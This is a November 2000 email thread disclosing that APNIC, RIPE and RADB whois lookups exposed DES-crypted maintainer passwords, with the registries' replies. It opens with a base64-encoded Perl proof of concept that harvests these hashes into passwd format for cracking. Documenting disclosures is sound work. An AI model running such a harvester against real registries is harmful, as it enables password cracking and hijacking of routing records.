IENyYWNrIChvciB5b3VyIGZhdm91cml0ZQojIERFUy1jcmFjayBwcm9ncmFtKSBvbiBpdCBh bmQgY3JlYXRlIHNvbWUgaGVhZGFjaGUgZm9yIHRoZSBgYEludGVybmV0CiMgY29tbXVuaXR5 Jycgd2hpY2ggaGFzIGRlY2lkZWQgdG8gcmV2ZWFsIERFUy1lbmNvZGVkIHBhc3N3b3JkcyBh cyBwYXJ0CiMgb2YgYSB3aG9pcyBsb29rdXAgb24gYSBtYWludGFpbmVyIG9iamVjdC4KIwoj IENvcHlyaWdodCAyMDAwLCBSYWp1IE1hdGh1ciA8cmFqdUBsaW51eC1kZWxoaS5vcmc+LCA8 cmFqdUBrYW5kYWxheWEub3JnPgojCiMgVGhpcyBwcm9ncmFtIGlzIGF2YWlsYWJsZSB1bmRl ciB0aGUgdGVybXMgb2YgdGhlIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNlbnNlCiMKdXNlIHN0 cmljdCA7CiMKIyBDdXJyZW50bHkgd2lsbCB3b3JrIG9uIFJJUEUgYW5kIEFQTklDCiMKbXkK ICAkY291bnQgPSAwIDsKbXkKICAkb3V0ZmlsZSA9IHNoaWZ0IDsKbXkKICAkcmVnaXN0cnkg PSBzaGlmdCA7CmlmICggIWRlZmluZWQgJG91dGZpbGUgfHwgIWRlZmluZWQgJHJlZ2lzdHJ5 CiAgICAgfHwgJHJlZ2lzdHJ5ICF+IC9hcG5pYy9pICYmICRyZWdpc3RyeSAhfiAvcmlwZS9p ICkKewogIHByaW50IFNUREVSUiAidXNhZ2U6ICQwIG91dHB1dC1maWxlIEFQTklDfFJJUEUg W3N0YXJ0IEFTXSBbZW5kIEFTXVxuIiA7CiAgZXhpdCAxIDsKfQpvcGVuIE9VVCAsICI+JG91 dGZpbGUiCiAgb3IgZGllICJDYW5ub3Qgd3JpdGUgdG8gJG91dGZpbGU6ICQhXG4iIDsKbXkK ICAkc3RhcnRhcyA9IHNoaWZ0IDsKJHN0YXJ0YXMgPSAxCiAgaWYgIWRlZmluZWQgJHN0YXJ0 YXMgOwpteQogICRlbmRhcyA9IHNoaWZ0IDsKJGVuZGFzID0gMTIwMDAKICBpZiAhZGVmaW5l ZCAkZW5kYXMgOwpteQogICRzZXJ2ZXIgPSAid2hvaXMuYXBuaWMubmV0IiA7CiRzZXJ2ZXIg PSAid2hvaXMucmlwZS5uZXQiCiAgaWYgJHJlZ2lzdHJ5ID1+IC9yaXBlL2kgOwpteQogICRt YWludGFpbmVyIDsKbXkKICAkZGVzY3IgOwpteQogICRub3RpZnkgOwpteQogICRhdXRoIDsK bXkKICAkcGFzc3dkIDsKZm9yZWFjaCBteSAkaSAoICRzdGFydGFzLi4kZW5kYXMgKQp7CiAg cHJpbnQgIioqKiBBUyRpXG4iIDsKICBvcGVuIFdIT0lTICwgIndob2lzIEFTJGlcQCRzZXJ2 ZXJ8IgogICAgb3IgZGllICJDYW5ub3Qgd2hvaXMgQVMkaTogJCFcbiIgOwogIHdoaWxlICgg PFdIT0lTPiApCiAgewogICAgaWYgKCAvXm1udC1ieTpccyooLiopLyApCiAgICB7CiAgICAg ICRtYWludGFpbmVyID0gJDEgOwogICAgICBsYXN0IDsKICAgIH0KICB9CiAgY2xvc2UgV0hP SVMgOwogIG5leHQKICAgIGlmICEkbWFpbnRhaW5lciA7CiAgcHJpbnQgIioqKiAkbWFpbnRh aW5lclxuIiA7CiAgb3BlbiBXSE9JUyAsICJ3aG9pcyAkbWFpbnRhaW5lclxAJHNlcnZlcnwi CiAgICBvciBkaWUgIkNhbm5vdCB3aG9pcyAkbWFpbnRhaW5lcjogJCFcbiIgOwogICRkZXNj ciA9ICIiIDsKICB3aGlsZSAoIDxXSE9JUz4gKQogIHsKICAgIGlmICggJF8gPX4gL15kZXNj cjpccyooLiopLyApCiAgICB7CiAgICAgICRkZXNjciAuPSAiJDEsICIgOwogICAgfQogICAg aWYgKCAkXyA9fiAvXm1udC1uZnk6XHMqKC4qKS8gKQogICAgewogICAgICAkbm90aWZ5ID0g JDEgOwogICAgfQogICAgaWYgKCAkXyA9fiAvXmF1dGg6XHMqKC4qKS8gKQogICAgewogICAg ICAkYXV0aCA9ICQxIDsKICAgIH0KICAgIGxhc3QgaWYgJGF1dGggJiYgJGF1dGggPX4gL2Ny eXB0LXB3L2kgOwogIH0KICBuZXh0CiAgICBpZiAhJGF1dGggfHwgJGF1dGggIX4gL2NyeXB0 LXB3L2kgOwpwcmludCAiKioqIDwkZGVzY3I+IDwkbm90aWZ5PiA8JGF1dGg+XG4iIDsKICBj bG9zZSBXSE9JUyA7CiAgJGF1dGggPX4gLy4qY3J5cHQtcHdccyooLiopL2kgOwogICRwYXNz d2QgPSAkMSA7CiAgJGRlc2NyID1+IHMvW1xuOl0vL2cgOwogICRub3RpZnkgPX4gcy86Ly9n IDsKICBwcmludCBPVVQgIiRtYWludGFpbmVyOiRwYXNzd2Q6NDI6NDI6JGRlc2NyOi9kZXYv bnVsbDovYmluL3NoXG4iIDsKICAkYXV0aCA9ICIiIDsKICAkY291bnQrKyA7Cn0KY2xvc2Ug T1VUIDsKcHJpbnQgIiRjb3VudCByZWNvcmRzXG4iIDsK -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.1 (GNU/Linux) Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard iEYEARECAAYFAjotvCEACgkQyWjQ78xo0X94dACfcsDJ3l0Bmcyx1lsLJiTGBR1P Y64An3DG7QZV0wsFlzArEDiUOQJdQEt7 =kjtc -----END PGP SIGNATURE----- From raju Sat Nov 25 10:46:39 2000 From: Raju Mathur MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14879.19255.567069.418332@localhost.localdomain> Date: Sat, 25 Nov 2000 10:46:39 +0530 (IST) To: webmaster@apnic.net Subject: Crypted passwords for maintainer objects X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid Reply-To: raju@linux-delhi.org Status: RO -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I see that doing a whois on a maintainer object in your whois database reveals the DES-encrypted password of the maintainer. As you are aware, it is trivial to brute-force crack (decode) a DES password, and this is a serious security hole in your service. Please treat this as a critical issue and refrain from revealing the DES-encrypted password in whois lookups. I shall be going public with this information in one week. Request you to have fixed the problem by then. Regards, - -- Raju Mathur -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.1 (GNU/Linux) Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard iEYEARECAAYFAjofSxAACgkQyWjQ78xo0X+1YACeOxPCthdC/jah0K3JoJFbdPNi /SkAnjdq+7pYmV5YcuoO/laYulSC56Kt =HmKH -----END PGP SIGNATURE----- From raju Sat Nov 25 13:19:05 2000 From: Raju Mathur MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14879.28401.445564.476080@localhost.localdomain> Date: Sat, 25 Nov 2000 13:19:05 +0530 (IST) To: webmaster@ripe.net, ncc@ripe.net Subject: Crypted passwords for maintainer objects X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid Reply-To: raju@linux-delhi.org Status: RO -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I see that doing a whois on a maintainer object in your whois database reveals the DES-encrypted password of the maintainer if s/he is using password as his/her authentication scheme. As you are aware, it is trivial to brute-force crack (decode) a DES password, and this is a serious security hole in your service. Please treat this as a critical issue and refrain from revealing the DES-encrypted password in whois lookups. I shall be going public with this information in one week. Request you to have fixed the problem by then. Regards, - -- Raju Mathur -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.1 (GNU/Linux) Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard iEYEARECAAYFAjofbtUACgkQyWjQ78xo0X/gtwCgjRMfSEBwGhjJN7pN+/bG47Ob 6zcAn0IhxrFwqqmAybUmqcdl5I3XJljz =zRSe -----END PGP SIGNATURE----- From raju Sat Nov 25 14:53:34 2000 From: Raju Mathur MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14879.34070.278516.159670@localhost.localdomain> Date: Sat, 25 Nov 2000 14:53:34 +0530 (IST) To: db-admin@radb.net, www@merit.edu Subject: Crypted passwords for maintainer objects X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid Reply-To: raju@linux-delhi.org Status: RO -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I see that doing a whois on a maintainer object in your whois database reveals the DES-encrypted password of the maintainer if s/he is using password as his/her authentication scheme. As you are aware, it is trivial to brute-force crack (decode) a DES password, and this is a serious security hole in your service. Please treat this as a critical issue and refrain from revealing the DES-encrypted password in whois lookups. I shall be going public with this information in one week. Request you to have fixed the problem by then. Regards, - -- Raju Mathur -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.1 (GNU/Linux) Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard iEYEARECAAYFAjofhQsACgkQyWjQ78xo0X/ypQCfS4NkeuyRMD9Qshx743dgVt1z FmMAn3e/ahXFjLVuVGu02KvkdHjDx/kK =SPnT -----END PGP SIGNATURE----- From raju Mon Nov 27 13:17:01 2000 From: Raju Mathur MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14882.4469.52414.25633@localhost.localdomain> Date: Mon, 27 Nov 2000 13:17:01 +0530 (IST) To: Bruce Campbell via RT Cc: ripe-dbm@ripe.net, gerald@merit.edu (Gerald Andrew Winters), db-admin@radb.net, irrd-team@merit.edu Subject: [APNIC #62050] (technical) Crypted passwords for maintainer objects In-Reply-To: <200011270657.QAA25403@hadrian.staff.apnic.net> References: <200011270657.QAA25403@hadrian.staff.apnic.net> X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid Reply-To: raju@linux-delhi.org Status: RO -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi Bruce, I've already sent a copy of this mail to RIPE and RADB. RADB's reply basically states that ``it's what the users want, so our hands are tied'', which isn't very heartening. I'm still awating a response from RIPE. While I agree that users (in general) should be given what they want, I would still not (for example) allow a password-less account as a Unix system administrator. I have yet to evaluate the extent of damage that a person with a cracked APNIC, RIPE or RADB password could do, but I suspect that it could be pretty serious, at least in the short term. I presume that even if someone manages to change an object in your database the owner/maintainer of that object would still be notified and have the option of correcting the issue; however even a short-term rogue change in the database can have global routing and security implications (e.g. a change in the in.addr-arpa database could be the precursor for major security breaches). Please allow me to reiterate that the policy of displaying CRYPT-PW passwords without control is viewed by me personally with great concern, and I suspect that that is the view most security professionals also would take. My objective is to have a secure, stable Internet, and I'm willing to do anything in power to work towards this goal. If one of those tasks is to bring potential security holes into the limelight, I shall do that (by posting to BUGTRAQ and CERT, albeit reluctantly); before that, however, I would request you again to fix the problem at the source rather than have half the script-kiddies in the world trying to attack your databases, and maybe succeeding. Regards, - -- Raju >>>>> "Bruce" == Bruce Campbell via RT writes: Bruce> raju@linux-delhi.org wrote (Sat, Nov 25 2000 15:22:36): >> I see that doing a whois on a maintainer object in your whois >> database reveals the DES-encrypted password of the maintainer. >> As you are aware, it is trivial to brute-force crack (decode) a >> DES password, and this is a serious security hole in your >> service. Please treat this as a critical issue and refrain >> from revealing the DES-encrypted password in whois lookups. Bruce> The APNIC Whois Databases uses code developed by our sister Bruce> organisation for Europe (the RIPE NCC) and shares many of Bruce> the same issues. The issue regarding the visibility of the Bruce> 'auth' attribute in the maintainer object has been Bruce> discussed before, however I regret that I am unable to find Bruce> an online reference for this discussion. Bruce> I am cc'ing the appropriate address in the RIPE NCC in the Bruce> hopes that they can provide a more definitive reference ( a Bruce> reply to the APNIC ticketing system will also reply to the Bruce> original requestor ). >> I shall be going public with this information in one week. >> Request you to have fixed the problem by then. Bruce> Kind regards, Bruce> -- Bruce Campbell Bruce> +61-7-3367-0490 Systems Administrator Regional Internet Bruce> Registry Asia Pacific Network Information Centre For the Bruce> Asia Pacific Region http://www.apnic.net/db/ Bruce> whois.APNIC.net Bruce> -------------------------------------------- Managed by Bruce> Request Tracker -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.1 (GNU/Linux) Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard iEYEARECAAYFAjoiEKgACgkQyWjQ78xo0X/OewCeO209lBqSTBrlWms8j81Lmxtb vhoAnjvjbJHfE7QQ4scbd8q3ri5bokPF =mKDL -----END PGP SIGNATURE----- From raju Thu Nov 30 11:00:19 2000 From: Raju Mathur MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14885.58859.501931.193491@localhost.localdomain> Date: Thu, 30 Nov 2000 11:00:19 +0530 (IST) To: RIPE Database Administration via RT Cc: technical@apnic.net (Bruce Campbell via RT), ripe-dbm@ripe.net, db-admin@radb.net, irrd-team@merit.edu, gerald@merit.edu (Gerald Andrew Winters) Subject: [APNIC #62050] (technical) Crypted passwords for maintainer objects In-Reply-To: <200011291033.UAA16435@hadrian.staff.apnic.net> References: <200011291033.UAA16435@hadrian.staff.apnic.net> X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid Reply-To: raju@linux-delhi.org Status: RO [Munging two messages into one reply to keep everyone in sync] Hi Gerald, Mr/Ms Magee, Calculate cost of 1% of maintainer objects in the databases getting perverted using a script like the attached one. Weigh against cost of public outcry if you unilaterally decide to not reveal auth schemes in whois lookups. Decide which is cheaper. I'm not going public with the script until either a deadline for changing the whois behaviour determined by you passes, or you decide not to make such a deadline. Regards, -- Raju >>>>> "RIPE" == RIPE Database Administration via RT writes: RIPE> Dear Raju Mathur, This matter was originally raised in RIPE> October 1994, when the RIPE document ripe-120 RIPE> (ftp://ftp.ripe.net/ripe/docs/ripe-120.txt) was published: RIPE> "It is by no means meant to keep out a determined malicious RIPE> attacker. The crypt function is vulnerable to exhaustive RIPE> search by (lots of) fast machines and programs to do the RIPE> searching are widely available. For this reason it is RIPE> strongly discouraged to use encrypted passwords also used RIPE> for other purposes such as Unix login accounts in this RIPE> scheme. As you are publishing the encrypted password in the RIPE> database it is open to attack." RIPE> This was re-stated in ripe-153 (published in January 1997) RIPE> and in ripe-157 (published in May 1997). In November 1998, RIPE> ripe-189 was published, in which the RIPE NCC announced that RIPE> it was supporting PGP authentication in the RIPE Database RIPE> (the scheme is also described in RFC-2726). In January RIPE> 1999, the RIPE NCC published ripe-190, offering free PGP RIPE> licences on request, to anyone who had a mntner object in RIPE> the RIPE Database. At every RIPE Meeting since that time, RIPE> the RIPE NCC has encouraged the RIPE community to adopt PGP RIPE> authentication. RIPE> The RIPE NCC does not manage the data in the RIPE Network RIPE> Management Database. The responsibility for maintaining and RIPE> protecting the data is with those who put the data in there. RIPE> However, the RIPE NCC has provided a PGP authentication RIPE> scheme and encourages its use. RIPE> You give a one-week deadline before you make a public RIPE> statement about this. We cannot unilaterly change the RIPE> functionality of the RIPE Database; we only act on the RIPE> instructions of the RIPE Database Working Group, which has a RIPE> mailing list: . We invite you to express RIPE> your concerns on that list. RIPE> BTW, this is the first message from you that I have seen. I RIPE> am investigating if we received any other message from you RIPE> previous to this one. RIPE> If you have any more questions, please contact RIPE> . RIPE> Kind regards, RIPE> A. M. R. Magee ______________ RIPE NCC RIPE> Raju Mathur writes: * -----BEGIN PGP RIPE> SIGNED MESSAGE----- * Hash: SHA1 * * Hi Bruce, * * I've RIPE> already sent a copy of this mail to RIPE and RADB. RADB's RIPE> reply * basically states that ``it's what the users want, so RIPE> our hands are * tied'', which isn't very heartening. I'm RIPE> still awating a response * from RIPE. * * While I agree RIPE> that users (in general) should be given what they want, * I RIPE> would still not (for example) allow a password-less account RIPE> as a * Unix system administrator. I have yet to evaluate RIPE> the extent of * damage that a person with a cracked APNIC, RIPE> RIPE or RADB password could * do, but I suspect that it RIPE> could be pretty serious, at least in the * short term. I RIPE> presume that even if someone manages to change an * object RIPE> in your database the owner/maintainer of that object would * RIPE> still be notified and have the option of correcting the RIPE> issue; however * even a short-term rogue change in the RIPE> database can have global routing * and security implications RIPE> (e.g. a change in the in.addr-arpa database * could be the RIPE> precursor for major security breaches). * * Please allow me RIPE> to reiterate that the policy of displaying CRYPT-PW * RIPE> passwords without control is viewed by me personally with RIPE> great * concern, and I suspect that that is the view most RIPE> security * professionals also would take. My objective is RIPE> to have a secure, * stable Internet, and I'm willing to do RIPE> anything in power to work * towards this goal. If one of RIPE> those tasks is to bring potential * security holes into the RIPE> limelight, I shall do that (by posting to * BUGTRAQ and RIPE> CERT, albeit reluctantly); before that, however, I would * RIPE> request you again to fix the problem at the source rather RIPE> than have * half the script-kiddies in the world trying to RIPE> attack your databases, * and maybe succeeding. * * Regards, RIPE> * * - -- Raju * * >>>>> "Bruce" == Bruce Campbell via RT RIPE> writes: * * Bruce> RIPE> raju@linux-delhi.org wrote (Sat, Nov 25 2000 15:22:36): * >> RIPE> I see that doing a whois on a maintainer object in your RIPE> whois * >> database reveals the DES-encrypted password of RIPE> the maintainer. * >> As you are aware, it is trivial to RIPE> brute-force crack (decode) a * >> DES password, and this is RIPE> a serious security hole in your * >> service. Please treat RIPE> this as a critical issue and refrain * >> from revealing the RIPE> DES-encrypted password in whois lookups. * * Bruce> The RIPE> APNIC Whois Databases uses code developed by our sister * RIPE> Bruce> organisation for Europe (the RIPE NCC) and shares RIPE> many of * Bruce> the same issues. The issue regarding the RIPE> visibility of the * Bruce> 'auth' attribute in the RIPE> maintainer object has been * Bruce> discussed before, RIPE> however I regret that I am unable to find * Bruce> an online RIPE> reference for this discussion. * * Bruce> I am cc'ing the RIPE> appropriate address in the RIPE NCC in the * Bruce> hopes RIPE> that they can provide a more definitive reference ( a * RIPE> Bruce> reply to the APNIC ticketing system will also reply RIPE> to the * Bruce> original requestor ). * * >> I shall be RIPE> going public with this information in one week. * >> RIPE> Request you to have fixed the problem by then. * * Bruce> RIPE> Kind regards, * * Bruce> -- Bruce Campbell RIPE> * Bruce> +61-7-3367-0490 Systems RIPE> Administrator Regional Internet * Bruce> Registry Asia RIPE> Pacific Network Information Centre For the * Bruce> Asia RIPE> Pacific Region http://www.apnic.net/db/ * Bruce> RIPE> whois.APNIC.net * * * * Bruce> RIPE> -------------------------------------------- Managed by * RIPE> Bruce> Request Tracker * -----BEGIN PGP SIGNATURE----- * RIPE> Version: GnuPG v1.0.1 (GNU/Linux) * Comment: Processed by RIPE> Mailcrypt 3.5.5 and Gnu Privacy Guard g.org/> * * RIPE> iEYEARECAAYFAjoiEKgACgkQyWjQ78xo0X/OewCeO209lBqSTBrlWms8j81Lmxtb RIPE> * vhoAnjvjbJHfE7QQ4scbd8q3ri5bokPF * =mKDL * -----END PGP RIPE> SIGNATURE----- * RIPE> --- Headers Follow --- >> From info@apnic.net Wed Nov 29 20:33:24 2000 RIPE> Received: (from info@localhost) by hadrian.staff.apnic.net RIPE> (8.9.3/8.9.3) id UAA16430 for technical-ticket; Wed, 29 Nov RIPE> 2000 20:33:24 +1000 (EST) Received: from guardian.apnic.net RIPE> (int-gw.staff.apnic.net [192.168.1.254]) by RIPE> hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id UAA16426 RIPE> for ; Wed, 29 Nov 2000 20:33:24 RIPE> +1000 (EST) Received: (from mail@localhost) by RIPE> guardian.apnic.net (8.9.3/8.9.3) id UAA29609 for RIPE> ; Wed, 29 Nov 2000 20:33:24 +1000 RIPE> (EST) Received: from whois1.apnic.net(203.37.255.98) by RIPE> int-gw.staff.apnic.net via smap (V2.1) id xma029607; Wed, 29 RIPE> Nov 00 20:33:04 +1000 Received: from birch.ripe.net RIPE> (birch.ripe.net [193.0.1.96]) by ns.apnic.net (8.9.3/8.9.3) RIPE> with ESMTP id UAA122202 for ; Wed, 29 RIPE> Nov 2000 20:33:04 +1000 (EST) Received: from ripe.net RIPE> (office.ripe.net [193.0.1.97]) by birch.ripe.net RIPE> (8.8.8/8.8.8) with ESMTP id LAA24135; Wed, 29 Nov 2000 RIPE> 11:31:26 +0100 (CET) Message-Id: RIPE> <200011291031.LAA24135@birch.ripe.net> To: RIPE> raju@linux-delhi.org cc: Bruce Campbell via RT RIPE> , gerald@merit.edu (Gerald Andrew RIPE> Winters), db-admin@radb.net, irrd-team@merit.edu Subject: RIPE> Re: [APNIC #62050] (technical) Crypted passwords for RIPE> maintainer objects In-reply-to: Your message of Mon, 27 Nov RIPE> 2000 13:17:01 +0530. RIPE> <14882.4469.52414.25633@localhost.localdomain> References: RIPE> <14882.4469.52414.25633@localhost.localdomain> From: RIPE RIPE> Database Administration X-Organization: RIPE> RIPE Network Coordination